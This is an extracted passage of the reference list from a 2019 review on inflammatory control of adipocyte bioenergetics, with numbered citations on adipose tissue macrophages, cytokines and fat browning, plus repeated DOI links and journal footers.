04:58:28PM via free access https://doi.org/10.1002/jcp.25994 https://doi.org/10.1007/s00125-007-0776-z https://doi.org/10.1007/s00125-007-0776-z https://doi.org/10.1016/j.bbabio.2010.05.005 https://doi.org/10.1073/pnas.84.4.1025 https://doi.org/10.1042/BJ20131176 https://doi.org/10.1042/BJ20131176 https://doi.org/10.1093/hmg/ddu193 https://doi.org/10.1093/hmg/ddu193 https://doi.org/10.1152/physiolgenomics.2000.3.2.75 https://doi.org/10.1152/physiolgenomics.2000.3.2.75 https://doi.org/10.1152/ajpendo.00143.2016 https://doi.org/10.1016/j.cmet.2011.08.007 https://doi.org/10.1371/journal.pone.0077077 https://doi.org/10.1371/journal.pone.0077077 https://doi.org/10.1096/fj.13-238725 https://doi.org/10.1128/MCB.23.3.1085-1094.2003 https://doi.org/10.1016/j.resp.2004.12.013 https://doi.org/10.1016/j.resp.2004.12.013 https://doi.org/10.1113/jphysiol.2009.184754 https://doi.org/10.1113/jphysiol.2009.184754 https://doi.org/10.1210/en.2014-1689 https://doi.org/10.1172/JCI116191 https://doi.org/10.2337/db10-0398 https://doi.org/10.1038/nutd.2012.29 https://doi.org/10.1038/nutd.2012.29 https://doi.org/10.1016/j.molmet.2018.11.006 https://doi.org/10.1016/j.molmet.2018.11.006 https://doi.org/10.1152/ajpendo.2006.263.6.E1063 https://doi.org/10.1074/jbc.R300017200 https://doi.org/10.1016/j.bbalip.2013.02.003 https://doi.org/10.1038/nrm2391 https://doi.org/10.1172/JCI21752 https://doi.org/10.1038/s41598-017-04369-2 https://doi.org/10.1016/0014-5793(79)81056-X https://doi.org/10.1016/0014-5793(79)81056-X https://doi.org/10.1096/fasebj.6.7.1563593 https://doi.org/10.1096/fasebj.6.7.1563593 https://doi.org/10.1210/jcem.86.7.7670 https://doi.org/10.1210/jcem.86.7.7670 https://creativecommons.org/licenses/by-nc-nd/4.0/ https://creativecommons.org/licenses/by-nc-nd/4.0/ https://creativecommons.org/licenses/by-nc-nd/4.0/ https://doi.org/10.1530/EC-19-0016 https://ec.bioscientifica.com M Keuper Inflammatory control of adipocyte bioenergetics R1198:6 of Applied Physiology 1997 83 166–171. (https://doi.org/10.1152/ jappl.1997.83.1.166) 115 Ceperuelo-Mallafré V, Ejarque M, Serena C, Duran X, Montori- Grau M, Rodríguez MA, Yanes O, Núñez-Roa C, Roche K, Puthanveetil P, et al. Adipose tissue glycogen accumulation is associated with obesity-linked inflammation in humans. Molecular Metabolism 2016 5 5–18. (https://doi.org/10.1016/j. molmet.2015.10.001) 116 Si Y, Palani S, Jayaraman A & Lee K. Effects of forced uncoupling protein 1 expression in 3T3-L1 cells on mitochondrial function and lipid metabolism. Journal of Lipid Research 2007 48 826–836. (https:// doi.org/10.1194/jlr.M600343-JLR200) 117 Si Y, Shi H & Lee K. Metabolic flux analysis of mitochondrial uncoupling in 3T3-L1 adipocytes. PLoS ONE 2009 4 e7000. (https:// doi.org/10.1371/journal.pone.0007000) 118 Mitrou P, Boutati E, Lambadiari V, Maratou E, Papakonstantinou A, Komesidou V, Sidossis L, Tountas N, Katsilambros N, Economopoulos T, et al. Rates of glucose uptake in adipose tissue and muscle in vivo after a mixed meal in women with morbid obesity. Journal of Clinical Endocrinology and Metabolism 2009 94 2958–2961. (https://doi.org/10.1210/jc.2008-2297) 119 Tejerina S, De Pauw A, Vankoningsloo S, Houbion A, Renard P, De Longueville F, Raes M & Arnould T. Mild mitochondrial uncoupling induces 3T3-L1 adipocyte de-differentiation by a PPAR-independent mechanism, whereas TNF-induced de-differentiation is PPAR dependent. Journal of Cell Science 2009 122 145–155. (https://doi. org/10.1242/jcs.027508) 120 Stefan N, Kantartzis K, Machann J, Schick F, Thamer C, Rittig K, Balletshofer B, Machicao F, Fritsche A & Häring HU. Identification and characterization of metabolically benign obesity in humans. Archives of Internal Medicine 2008 168 1609–1616. (https://doi. org/10.1001/archinte.168.15.1609) 121 Klöting N, Fasshauer M, Dietrich A, Kovacs P, Schön MR, Kern M, Stumvoll M & Blüher M. Insulin-sensitive obesity. American Journal of Physiology: Endocrinology and Metabolism 2010 299 E506–E515. (https://doi.org/10.1152/ajpendo.00586.2009) 122 Phillips CM & Perry IJ. Does inflammation determine metabolic health status in obese and nonobese adults? Journal of Clinical Endocrinology and Metabolism 2013 98 E1610–E1619. (https://doi. org/10.1210/jc.2013-2038) 123 Wildman RP, Kaplan R, Manson JE, Rajkovic A, Connelly SA, Mackey RH, Tinker LF, Curb JD, Eaton CB & Wassertheil‐Smoller S. Body size phenotypes and inflammation in the women’s health initiative observational study. Obesity 2011 19 1482–1491. (https:// doi.org/10.1038/oby.2010.332) 124 Karelis AD, Faraj M, Bastard JP, St-Pierre DH, Brochu M, Prud’homme D & Rabasa-Lhoret R. The metabolically healthy but obese individual presents a favorable inflammation profile. Journal of Clinical Endocrinology and Metabolism 2005 90 4145–4150. (https:// doi.org/10.1210/jc.2005-0482) 125 Zhang HH, Halbleib M, Ahmad F, Manganiello VC & Greenberg AS. Tumor necrosis factor-alpha stimulates lipolysis in differentiated human adipocytes through activation of extracellular signal- related kinase and elevation of intracellular cAMP. Diabetes 2002 51 2929–2935 (https://doi.org/10.2337/diabetes.51.10.2929) 126 Gao D, Madi M, Ding C, Fok M, Steele T, Ford C, Hunter L & Bing C. Interleukin-1β mediates macrophage-induced impairment of insulin signaling in human primary adipocytes. American Journal of Physiology: Endocrinology and Metabolism 2014 307 E289–E304. (https://doi.org/10.1152/ajpendo.00430.2013) 127 van Hall G, Steensberg A, Sacchetti M, Fischer C, Keller C, Schjerling P, Hiscock N, Møller K, Saltin B, Febbraio MA, et al. Interleukin-6 stimulates lipolysis and fat oxidation in humans. Journal of Clinical Endocrinology and Metabolism 2003 88 3005–3010. (https://doi.org/10.1210/jc.2002-021687) 128 Hotamisligil GS, Murray DL, Choy LN & Spiegelman BM. Tumor necrosis factor alpha inhibits signaling from the insulin receptor. PNAS 1994 91 4854–4858. (https://doi.org/10.1073/ pnas.91.11.4854) 129 Xie X, Sinha S, Yi Z, Langlais PR, Madan M, Bowen BP, Willis W & Meyer C. Role of adipocyte mitochondria in inflammation, lipemia and insulin sensitivity in humans: effects of pioglitazone treatment. International Journal of Obesity 2017 42 213–220. (https://doi. org/10.1038/ijo.2017.192) 130 Ohashi K, Parker JL, Ouchi N, Higuchi A, Vita JA, Gokce N, Pedersen AA, Kalthoff C, Tullin S, Sams A, et al. Adiponectin promotes macrophage polarization toward an anti-inflammatory phenotype. Journal of Biological Chemistry 2010 285 6153–6160. (https://doi.org/10.1074/jbc.M109.088708) 131 Maya-Monteiro CM, Almeida PE, D’Avila H, Martins AS, Rezende AP, Castro-Faria-Neto H & Bozza PT. Leptin induces macrophage lipid body formation by a phosphatidylinositol 3-kinase- and mammalian target of rapamycin-dependent mechanism. Journal of Biological Chemistry 2008 283 2203–2210. (https://doi.org/10.1074/jbc. M706706200) 132 Tang L, Okamoto S, Shiuchi T, Toda C, Takagi K, Sato T, Saito K, Yokota S & Minokoshi Y. Sympathetic nerve activity maintains an anti-inflammatory state in adipose tissue in male mice by inhibiting TNF-α gene expression in macrophages. Endocrinology 2015 156 3680–3694. (https://doi.org/10.1210/EN.2015-1096) 133 Lumeng CN, Deyoung SM & Saltiel AR. Macrophages block insulin action in adipocytes by altering expression of signaling and glucose transport proteins. American Journal of Physiology: Endocrinology and Metabolism 2007 292 E166–E174. (https://doi.org/10.1152/ ajpendo.00284.2006) 134 Keuper M, Dzyakanchuk A, Amrein KE, Wabitsch M & Fischer- Posovszky P. THP-1 macrophages and SGBS adipocytes – a new human in vitro model system of inflamed adipose tissue. Frontiers in Endocrinology 2011 2 89. (https://doi.org/10.3389/fendo.2011.00089) 135 Stouthard JML, Oude Elferink RPJ & Sauerwein HP. Interleukin-6 enhances glucose transport in 3T3-L1 adipocytes. Biochemical and Biophysical Research Communications 1996 220 241–245. (https://doi. org/10.1006/bbrc.1996.0389) 136 Jager J, Grémeaux T, Cormont M, Le Marchand-Brustel Y & Tanti JF. Interleukin-1beta-induced insulin resistance in adipocytes through down-regulation of insulin receptor substrate-1 expression. Endocrinology 2007 148 241–251. (https://doi.org/10.1210/en.2006- 0692) 137 Sartipy P & Loskutoff DJ. Monocyte chemoattractant protein 1 in obesity and insulin resistance. PNAS 2003 100 7265–7270. (https:// doi.org/10.1073/pnas.1133870100) 138 Nøhr MK, Bobba N, Richelsen B, Lund S & Pedersen SB. Inflammation downregulates UCP1 expression in brown adipocytes potentially via SIRT1 and DBC1 interaction. International Journal of Molecular Sciences 2017 18 E1006. (https://doi.org/10.3390/ ijms18051006) 139 Goto T, Naknukool S, Yoshitake R, Hanafusa Y, Tokiwa S, Li Y, Sakamoto T, Nitta T, Kim M, Takahashi N, et al. Proinflammatory cytokine interleukin-1β suppresses cold-induced thermogenesis in adipocytes. Cytokine 2016 77 107–114. (https://doi.org/10.1016/j. cyto.2015.11.001) 140 Dahlman I, Forsgren M, Sjögren A, Nordström EA, Kaaman M, Näslund E, Attersand A & Arner P. Downregulation of electron transport chain genes in visceral adipose tissue in type 2 diabetes independent of obesity and possibly involving tumor necrosis factor-α. Diabetes 2006 55 1792–1799. (https://doi.org/10.2337/db05- 1421) 141 Wolf Y, Boura-Halfon S, Cortese N, Haimon Z, Sar Shalom H, Kuperman Y, Kalchenko V, Brandis A, David E, Segal-Hayoun Y, et al. Brown-adipose-tissue macrophages control tissue innervation This work is licensed under a Creative Commons Attribution-NonCommercial-NoDerivatives 4.0 International License. https://doi.org/10.1530/EC-19-0016 https://ec.bioscientifica.com © 2019 The authors Published by Bioscientifica Ltd Downloaded from Bioscientifica.com at 04/06/2021 04:58:28PM via free access https://doi.org/10.1152/jappl.1997.83.1.166 https://doi.org/10.1152/jappl.1997.83.1.166 https://doi.org/10.1016/j.molmet.2015.10.001 https://doi.org/10.1016/j.molmet.2015.10.001 https://doi.org/10.1194/jlr.M600343-JLR200 https://doi.org/10.1194/jlr.M600343-JLR200 https://doi.org/10.1371/journal.pone.0007000 https://doi.org/10.1371/journal.pone.0007000 https://doi.org/10.1210/jc.2008-2297 https://doi.org/10.1242/jcs.027508 https://doi.org/10.1242/jcs.027508 https://doi.org/10.1001/archinte.168.15.1609 https://doi.org/10.1001/archinte.168.15.1609 https://doi.org/10.1152/ajpendo.00586.2009 https://doi.org/10.1210/jc.2013-2038 https://doi.org/10.1210/jc.2013-2038 https://doi.org/10.1038/oby.2010.332 https://doi.org/10.1038/oby.2010.332 https://doi.org/10.1210/jc.2005-0482 https://doi.org/10.1210/jc.2005-0482 https://doi.org/10.2337/diabetes.51.10.2929 https://doi.org/10.1152/ajpendo.00430.2013 https://doi.org/10.1210/jc.2002-021687 https://doi.org/10.1073/pnas.91.11.4854 https://doi.org/10.1073/pnas.91.11.4854 https://doi.org/10.1038/ijo.2017.192 https://doi.org/10.1038/ijo.2017.192 https://doi.org/10.1074/jbc.M109.088708 https://doi.org/10.1074/jbc.M706706200 https://doi.org/10.1074/jbc.M706706200 https://doi.org/10.1210/EN.2015-1096 https://doi.org/10.1152/ajpendo.00284.2006 https://doi.org/10.1152/ajpendo.00284.2006 https://doi.org/10.3389/fendo.2011.00089 https://doi.org/10.1006/bbrc.1996.0389 https://doi.org/10.1006/bbrc.1996.0389 https://doi.org/10.1210/en.2006-0692 https://doi.org/10.1210/en.2006-0692 https://doi.org/10.1073/pnas.1133870100 https://doi.org/10.1073/pnas.1133870100 https://doi.org/10.3390/ijms18051006 https://doi.org/10.3390/ijms18051006 https://doi.org/10.1016/j.cyto.2015.11.001 https://doi.org/10.1016/j.cyto.2015.11.001 https://doi.org/10.2337/db05-1421 https://doi.org/10.2337/db05-1421 https://creativecommons.org/licenses/by-nc-nd/4.0/ https://creativecommons.org/licenses/by-nc-nd/4.0/ https://creativecommons.org/licenses/by-nc-nd/4.0/ https://doi.org/10.1530/EC-19-0016 https://ec.bioscientifica.com M Keuper Inflammatory control of adipocyte bioenergetics R120 PB–R17 8:6 and homeostatic energy expenditure. Nature Immunology 2017 18 665–674. (https://doi.org/10.1038/ni.3746) 142 Camell CD, Sander J, Spadaro O, Lee A, Nguyen KY, Wing A, Goldberg EL, Youm YH, Brown CW, Elsworth J, et al. Inflammasome- driven catecholamine catabolism in macrophages blunts lipolysis during ageing. Nature 2017 550 119–123. (https://doi.org/10.1038/ nature24022) 143 Balter NJ & Schwartz SL. Accumulation of norepinephrine by macrophages and relationships to known uptake processes. Journal of Pharmacology and Experimental Therapeutics 1977 201 636–643. 144 Fabbiano S, Suárez-Zamorano N, Rigo D, Veyrat-Durebex C, Stevanovic Dokic A, Colin DJ & Trajkovski M. Caloric restriction leads to browning of white adipose tissue through type 2 immune signaling. Cell Metabolism 2016 24 434–446. (https://doi. org/10.1016/j.cmet.2016.07.023) 145 Kim KH, Kim YH, Son JE, Lee JH, Kim S, Choe MS, Moon JH, Zhong J, Fu K, Lenglin F, et al. Intermittent fasting promotes adipose thermogenesis and metabolic homeostasis via VEGF-mediated alternative activation of macrophage. Cell Research 2017 27 1309–1326. (https://doi.org/10.1038/cr.2017.126) 146 Bartelt A & Heeren J. Adipose tissue browning and metabolic health. Nature Reviews: Endocrinology 2014 10 24–36. (https://doi. org/10.1038/nrendo.2013.204) 147 Abdullahi A, Chen P, Stanojcic M, Sadri AR, Coburn N & Jeschke MG. IL-6 signal from the bone marrow is required for the browning of white adipose tissue post burn injury. Shock 2017 47 33–39. (https:// doi.org/10.1097/SHK.0000000000000749) 148 Han J, Meng Q, Shen L & Wu G. Interleukin-6 induces fat loss in cancer cachexia by promoting white adipose tissue lipolysis and browning. Lipids in Health and Disease 2018 17 14. (https://doi. org/10.1186/s12944-018-0657-0) 149 Knudsen JG, Murholm M, Carey AL, Biensø RS, Basse AL, Allen TL, Hidalgo J, Kingwell BA, Febbraio MA, Hansen JB, et al. Role of IL-6 in exercise training- and cold-induced UCP1 expression in subcutaneous white adipose tissue. PLoS ONE 2014 9 e84910. (https://doi.org/10.1371/journal.pone.0084910) 150 Babaei R, Schuster M, Meln I, Lerch S, Ghandour RA, Pisani DF, Bayindir-Buchhalter I, Marx J, Wu S, Schoiswohl G, et al. Jak-TGFβ cross-talk links transient adipose tissue inflammation to beige adipogenesis. Science Signaling 2018 11 eaai7838. (https://doi. org/10.1126/scisignal.aai7838) 151 Lizcano F, Vargas D, Gómez Á & Torrado A. Human ADMC- derived adipocyte thermogenic capacity is regulated by IL-4 receptor. Stem Cells International 2017 2017 2767916. (https://doi. org/10.1155/2017/2767916) 152 Shiau MY, Lu HF, Chang YH, Chiu YC & Shih YL. Characterization of proteins regulated by interleukin-4 in 3T3-L1 adipocytes. SpringerPlus 2015 4 242. (https://doi.org/10.1186/s40064-015-0980-0) 153 Cautivo KM & Molofsky AB. Regulation of metabolic health and adipose tissue function by group 2 innate lymphoid cells. European Journal of Immunology 2016 46 1315–1325. (https://doi.org/10.1002/ eji.201545562) 154 Villarroya F, Cereijo R, Villarroya J, Gavaldà-Navarro A & Giralt M. Toward an understanding of how immune cells control brown and beige adipobiology. Cell Metabolism 2018 27 954–961. (https://doi. org/10.1016/j.cmet.2018.04.006) 155 Miller LE, Jüsten HP, Schölmerich J & Straub RH. The loss of sympathetic nerve fibers in the synovial tissue of patients with rheumatoid arthritis is accompanied by increased norepinephrine release from synovial macrophages. FASEB Journal 2000 14 2097–2107. (https://doi.org/10.1096/fj.99-1082com) 156 Spengler RN, Chensue SW, Giacherio DA, Blenk N & Kunkel SL. Endogenous norepinephrine regulates tumor necrosis factor-α production from macrophages in vitro. Journal of Immunology 1994 152 3024–3031. 157 Wankhade UD, Lee JH, Dagur PK, Yadav H, Shen M, Chen W, Kulkarni AB, McCoy JP, Finkel T, Cypess AM, et al. TGF-β receptor 1 regulates progenitors that promote browning of white fat. Molecular Metabolism 2018 16 160–171. (https://doi.org/10.1016/j. molmet.2018.07.008) 158 Yadav H, Quijano C, Kamaraju AK, Gavrilova O, Malek R, Chen W, Zerfas P, Zhigang D, Wright EC, Stuelten C, et al. Protection from obesity and diabetes by blockade of TGF-β/Smad3 signaling. Cell Metabolism 2011 14 67–79. (https://doi.org/10.1016/j. cmet.2011.04.013) 159 Petrus P, Mejhert N, Corrales P, Lecoutre S, Li Q, Maldonado E, Kulyté A, Lopez Y, Campbell M, Acosta JR, et al. Transforming growth factor-β3 regulates adipocyte number in subcutaneous white adipose tissue. Cell Reports 2018 25 551.e5–560.e5. (https://doi.org/10.1016/j. celrep.2018.09.069) 160 Pallotta I, Sun B, Wrona EA & Freytes DO. BMP protein-mediated crosstalk between inflammatory cells and human pluripotent stem cell- derived cardiomyocytes. Journal of Tissue Engineering and Regenerative Medicine 2017 11 1466–1478. (https://doi.org/10.1002/term.2045) 161 Tseng YH, Kokkotou E, Schulz TJ, Huang TL, Winnay JN, Taniguchi CM, Tran TT, Suzuki R, Espinoza DO, Yamamoto Y, et al. New role of bone morphogenetic protein 7 in brown adipogenesis and energy expenditure. Nature 2008 454 1000–1004. (https://doi. org/10.1038/nature07221) 162 Gustafson B, Hammarstedt A, Hedjazifar S, Hoffmann JM, Svensson PA, Grimsby J, Rondinone C & Smith U. BMP4 and BMP antagonists regulate human white and beige adipogenesis. Diabetes 2015 64 1670–1681. (https://doi.org/10.2337/db14-1127) 163 Modica S, Straub LG, Balaz M, Sun W, Varga L, Stefanicka P, Profant M, Simon E, Neubauer H, Ukropcova B, et al. Bmp4 promotes a brown to white-like adipocyte shift. Cell Reports 2016 16 2243–2258. (https://doi.org/10.1016/j.celrep.2016.07.048) 164 Whittle AJ, Carobbio S, Martins L, Slawik M, Hondares E, Vázquez MJ, Morgan D, Csikasz RI, Gallego R, Rodriguez-Cuenca S, et al. BMP8B increases brown adipose tissue thermogenesis through both central and peripheral actions. Cell 2012 149 871–885. (https:// doi.org/10.1016/j.cell.2012.02.066) 165 Pellegrinelli V, Peirce VJ, Howard L, Virtue S, Türei D, Senzacqua M, Frontini A, Dalley JW, Horton AR, Bidault G, et al. Adipocyte-secreted BMP8b mediates adrenergic-induced remodeling of the neuro- vascular network in adipose tissue. Nature Communications 2018 9 4974. (https://doi.org/10.1038/s41467-018-07453-x) 166 Schulz TJ & Tseng YH. Emerging role of bone morphogenetic proteins in adipogenesis and energy metabolism. Cytokine and Growth Factor Reviews 2009 20 523–531. (https://doi.org/10.1016/j. cytogfr.2009.10.019) 167 Varga T, Mounier R, Patsalos A, Gogolák P, Peloquin M, Horvath A, Pap A, Daniel B, Nagy G, Pintye E, et al. Macrophage PPARγ, a lipid activated transcription factor controls a growth factor GDF3 and skeletal muscle regeneration. Immunity 2016 45 1038–1051. (https:// doi.org/10.1016/j.immuni.2016.10.016) 168 Hinoi E, Nakamura Y, Takada S, Fujita H, Iezaki T, Hashizume S, Takahashi S, Odaka Y, Watanabe T & Yoneda Y. Growth differentiation factor-5 promotes brown adipogenesis in systemic energy expenditure. Diabetes 2014 63 162–175. (https://doi. org/10.2337/db13-0808) 169 Kim JM, Kosak JP, Kim JK, Kissling G, Germolec DR, Zeldin DC, Bradbury JA, Baek SJ & Eling TE. NAG-1/GDF15 transgenic mouse has less white adipose tissue and a reduced inflammatory response. Mediators of Inflammation 2013 2013 1–10. (https://doi. org/10.1155/2013/641851) 170 Onishi Y, Fukasawa K, Ozaki K, Iezaki T, Yoneda Y & Hinoi E. GDF1 is a novel mediator of macrophage infiltration in brown adipose tissue of obese mice. Biochemistry and Biophysics Reports 2016 5 216–223. (https://doi.org/10.1016/j.bbrep.2015.12.008) This work is licensed under a Creative Commons Attribution-NonCommercial-NoDerivatives 4.0 International License. https://doi.org/10.1530/EC-19-0016 https://ec.bioscientifica.com © 2019 The authors Published by Bioscientifica Ltd Downloaded from Bioscientifica.com at 04/06/2021 04:58:28PM via free access https://doi.org/10.1038/ni.3746 https://doi.org/10.1038/nature24022 https://doi.org/10.1038/nature24022 https://doi.org/10.1016/j.cmet.2016.07.023 https://doi.org/10.1016/j.cmet.2016.07.023 https://doi.org/10.1038/cr.2017.126 https://doi.org/10.1038/nrendo.2013.204 https://doi.org/10.1038/nrendo.2013.204 https://doi.org/10.1097/SHK.0000000000000749 https://doi.org/10.1097/SHK.0000000000000749 https://doi.org/10.1186/s12944-018-0657-0 https://doi.org/10.1186/s12944-018-0657-0 https://doi.org/10.1371/journal.pone.0084910 https://doi.org/10.1126/scisignal.aai7838 https://doi.org/10.1126/scisignal.aai7838 https://doi.org/10.1155/2017/2767916 https://doi.org/10.1155/2017/2767916 https://doi.org/10.1186/s40064-015-0980-0 https://doi.org/10.1002/eji.201545562 https://doi.org/10.1002/eji.201545562 https://doi.org/10.1016/j.cmet.2018.04.006 https://doi.org/10.1016/j.cmet.2018.04.006 https://doi.org/10.1096/fj.99-1082com https://doi.org/10.1016/j.molmet.2018.07.008 https://doi.org/10.1016/j.molmet.2018.07.008 https://doi.org/10.1016/j.cmet.2011.04.013 https://doi.org/10.1016/j.cmet.2011.04.013 https://doi.org/10.1016/j.celrep.2018.09.069 https://doi.org/10.1016/j.celrep.2018.09.069 https://doi.org/10.1002/term.2045 https://doi.org/10.1038/nature07221 https://doi.org/10.1038/nature07221 https://doi.org/10.2337/db14-1127 https://doi.org/10.1016/j.celrep.2016.07.048 https://doi.org/10.1016/j.cell.2012.02.066 https://doi.org/10.1016/j.cell.2012.02.066 https://doi.org/10.1038/s41467-018-07453-x https://doi.org/10.1016/j.cytogfr.2009.10.019 https://doi.org/10.1016/j.cytogfr.2009.10.019 https://doi.org/10.1016/j.immuni.2016.10.016 https://doi.org/10.1016/j.immuni.2016.10.016 https://doi.org/10.2337/db13-0808 https://doi.org/10.2337/db13-0808 https://doi.org/10.1155/2013/641851 https://doi.org/10.1155/2013/641851 https://doi.org/10.1016/j.bbrep.2015.12.008 https://creativecommons.org/licenses/by-nc-nd/4.0/ https://creativecommons.org/licenses/by-nc-nd/4.0/ https://creativecommons.org/licenses/by-nc-nd/4.0/ https://doi.org/10.1530/EC-19-0016 https://ec.bioscientifica.com M Keuper Inflammatory control of adipocyte bioenergetics R1218:6 171 Adela R & Banerjee SK. GDF-15 as a target and biomarker for diabetes and cardiovascular diseases: a translational prospective. Journal of Diabetes Research 2015 2015 490842. (https://doi. org/10.1155/2015/490842) 172 Shen JJ, Huang L, Li L, Jorgez C, Matzuk MM & Brown CW. Deficiency of growth differentiation factor 3 protects against diet- induced obesity by selectively acting on white adipose. Molecular Endocrinology 2009 23 113–123. (https://doi.org/10.1210/me.2007- 0322) 173 Modica S & Wolfrum C. The dual role of BMP4 in adipogenesis and metabolism. Adipocyte 2017 6 141–146. (https://doi.org/10.1080/216 23945.2017.1287637) 174 Emmerson PJ, Wang F, Du Y, Liu Q, Pickard RT, Gonciarz MD, Coskun T, Hamang MJ, Sindelar DK, Ballman KK, et al. The metabolic effects of GDF15 are mediated by the orphan receptor GFRAL. Nature Medicine 2017 23 1215–1219. (https://doi.org/10.1038/nm.4393) 175 Kelly B & O’Neill LA. Metabolic reprogramming in macrophages and dendritic cells in innate immunity. Cell Research 2015 25 771–784. (https://doi.org/10.1038/cr.2015.68) 176 Sugimoto M, Sakagami H, Yokote Y, Onuma H, Kaneko M, Mori M, Sakaguchi Y, Soga T & Tomita M. Non-targeted metabolite profiling in activated macrophage secretion. Metabolomics 2012 8 624–633. (https://doi.org/10.1007/s11306-011-0353-9) 177 Carrière A, Jeanson Y, Berger-Müller S, André M, Chenouard V, Arnaud E, Barreau C, Walther R, Galinier A, Wdziekonski B, et al. Browning of white adipose cells by intermediate metabolites: an adaptive mechanism to alleviate redox pressure. Diabetes 2014 63 3253–3265. (https://doi.org/10.2337/db13-1885) 178 Hanatani S, Motoshima H, Takaki Y, Kawasaki S, Igata M, Matsumura T, Kondo T, Senokuchi T, Ishii N, Kawashima J, et al. Acetate alters expression of genes involved in beige adipogenesis in 3T3-L1 cells and obese KK-Ay mice. Journal of Clinical Biochemistry and Nutrition 2016 59 207–214. (https://doi. org/10.3164/jcbn.16-23) 179 Sahuri-Arisoylu M, Brody LP, Parkinson JR, Parkes H, Navaratnam N, Miller AD, Thomas EL, Frost G & Bell JD. Reprogramming of hepatic fat accumulation and ‘browning’ of adipose tissue by the short-chain fatty acid acetate. International Journal of Obesity 2016 40 955–963. (https://doi.org/10.1038/ijo.2016.23) 180 Dalli J & Serhan CN. Specific lipid mediator signatures of human phagocytes: microparticles stimulate macrophage efferocytosis and pro-resolving mediators. Blood 2012 120 e60–e72. (https://doi. org/10.1182/blood-2012-04-423525) 181 Masoodi M, Kuda O, Rossmeisl M, Flachs P & Kopecky J. Lipid signaling in adipose tissue: connecting inflammation and metabolism. Biochimica et Biophysica Acta 2015 1851 503–518. (https://doi.org/10.1016/j.bbalip.2014.09.023) 182 Endo Y, Blinova K, Romantseva T, Golding H & Zaitseva M. Differences in PGE2 production between primary human monocytes and differentiated macrophages: role of IL-1β and TRIF/IRF3. PLoS ONE 2014 9 e98517. (https://doi.org/10.1371/journal.pone.0098517) 183 García-Alonso V, Titos E, Alcaraz-Quiles J, Rius B, Lopategi A, López- Vicario C, Jakobsson PJ, Delgado S, Lozano J & Clària J. Prostaglandin E2 exerts multiple regulatory actions on human obese adipose tissue remodeling, inflammation, adaptive thermogenesis and lipolysis. PLoS ONE 2016 11 e0153751. (https://doi.org/10.1371/journal. pone.0153751) 184 Suárez J, Rivera P, Arrabal S, Crespillo A, Serrano A, Baixeras E, Pavón FJ, Cifuentes M, Nogueiras R, Ballesteros J, et al. Oleoylethanolamide enhances β-adrenergic-mediated thermogenesis and white-to-brown adipocyte phenotype in epididymal white adipose tissue in rat. Disease Models and Mechanisms 2014 7 129–141. (https://doi.org/10.1242/dmm.013110) 185 Caër C, Rouault C, Roy TL, Poitou C, Aron-Wisnewsky J, Torcivia A, Bichet JC, Clément K, Guerre-Millo M & André S. Immune cell- derived cytokines contribute to obesity-related inflammation, fibrogenesis and metabolic deregulation in human adipose tissue. Scientific Reports 2017 7 3000. (https://doi.org/10.1038/s41598-017- 02660-w) 186 Wang B, Fu X, Liang X, Deavila JM, Wang Z, Zhao L, Tian Q, Zhao J, Gomez NA, Trombetta SC, et al. Retinoic acid induces white adipose tissue browning by increasing adipose vascularity and inducing beige adipogenesis of PDGFRα+ adipose progenitors. Cell Discovery 2017 3 17036. (https://doi.org/10.1038/celldisc.2017.36) 187 Darwich L, Coma G, Peña R, Bellido R, Blanco EJJ, Este JA, Borras FE, Clotet B, Ruiz L, Rosell A, et al. Secretion of interferon-γ by human macrophages demonstrated at the single-cell level after costimulation with interleukin (IL)-12 plus IL-18. Immunology 2009 126 386–393. (https://doi.org/10.1111/j.1365-2567.2008.02905.x) 188 Moisan A, Lee YK, Zhang JD, Hudak CS, Meyer CA, Prummer M, Zoffmann S, Truong HH, Ebeling M, Kiialainen A, et al. White-to- brown metabolic conversion of human adipocytes by JAK inhibition. Nature Cell Biology 2015 17 57–67. (https://doi.org/10.1038/ncb3075) 189 Cypess AM, Lehman S, Williams G, Tal I, Rodman D, Goldfine AB, Kuo FC, Palmer EL, Tseng YH, Doria A, et al. Identification and importance of brown adipose tissue in adult humans. New England Journal of Medicine 2009 360 1509–1517. (https://doi.org/10.1056/ NEJMoa0810780) 190 Porter C, Chondronikola M & Sidossis LS. The therapeutic potential of brown adipocytes in humans. Frontiers in Endocrinology 2015 6 156. (https://doi.org/10.3389/fendo.2015.00156) 191 Nedergaard J & Cannon B. The browning of white adipose tissue: some burning issues. Cell Metabolism 2014 20 396–407. (https://doi. org/10.1016/j.cmet.2014.07.005) Received in final form 2 May 2019 Accepted 14 May 2019 Accepted Preprint published online 14 May 2019 This work is licensed under a Creative Commons Attribution-NonCommercial-NoDerivatives 4.0 International License. https://doi.org/10.1530/EC-19-0016 https://ec.bioscientifica.com © 2019 The authors Published by Bioscientifica Ltd Downloaded from Bioscientifica.com at 04/06/2021 04:58:28PM via free access https://doi.org/10.1155/2015/490842 https://doi.org/10.1155/2015/490842 https://doi.org/10.1210/me.2007-0322 https://doi.org/10.1210/me.2007-0322 https://doi.org/10.1080/21623945.2017.1287637 https://doi.org/10.1080/21623945.2017.1287637 https://doi.org/10.1038/nm.4393 https://doi.org/10.1038/cr.2015.68 https://doi.org/10.1007/s11306-011-0353-9 https://doi.org/10.2337/db13-1885 https://doi.org/10.3164/jcbn.16-23 https://doi.org/10.3164/jcbn.16-23 https://doi.org/10.1038/ijo.2016.23 https://doi.org/10.1182/blood-2012-04-423525 https://doi.org/10.1182/blood-2012-04-423525 https://doi.org/10.1016/j.bbalip.2014.09.023 https://doi.org/10.1371/journal.pone.0098517 https://doi.org/10.1371/journal.pone.0153751 https://doi.org/10.1371/journal.pone.0153751 https://doi.org/10.1242/dmm.013110 https://doi.org/10.1038/s41598-017-02660-w https://doi.org/10.1038/s41598-017-02660-w https://doi.org/10.1038/celldisc.2017.36 https://doi.org/10.1111/j.1365-2567.2008.02905.x https://doi.org/10.1038/ncb3075 https://doi.org/10.1056/NEJMoa0810780 https://doi.org/10.1056/NEJMoa0810780 https://doi.org/10.3389/fendo.2015.00156 https://doi.org/10.1016/j.cmet.2014.07.005 https://doi.org/10.1016/j.cmet.2014.07.005 https://creativecommons.org/licenses/by-nc-nd/4.0/ https://creativecommons.org/licenses/by-nc-nd/4.0/ https://creativecommons.org/licenses/by-nc-nd/4.0/ https://doi.org/10.1530/EC-19-0016 https://ec.bioscientifica.com Abstract Introduction Adipose tissue macrophages (ATMΦ) MΦ number increases in human white adipose tissue during obesity The local accumulation of ATMΦ in obese WAT The physiological importance of dynamic ATMΦ for WAT biology ATMΦ display a mixed phenotype in obese WAT The bioenergetics of human white fat cells Mitochondrial activity is important for lipid storage and secretory function of human white adipocytes The bioenergetic profile of (pre-)adipocytes and the regulation by nutrients and hormones 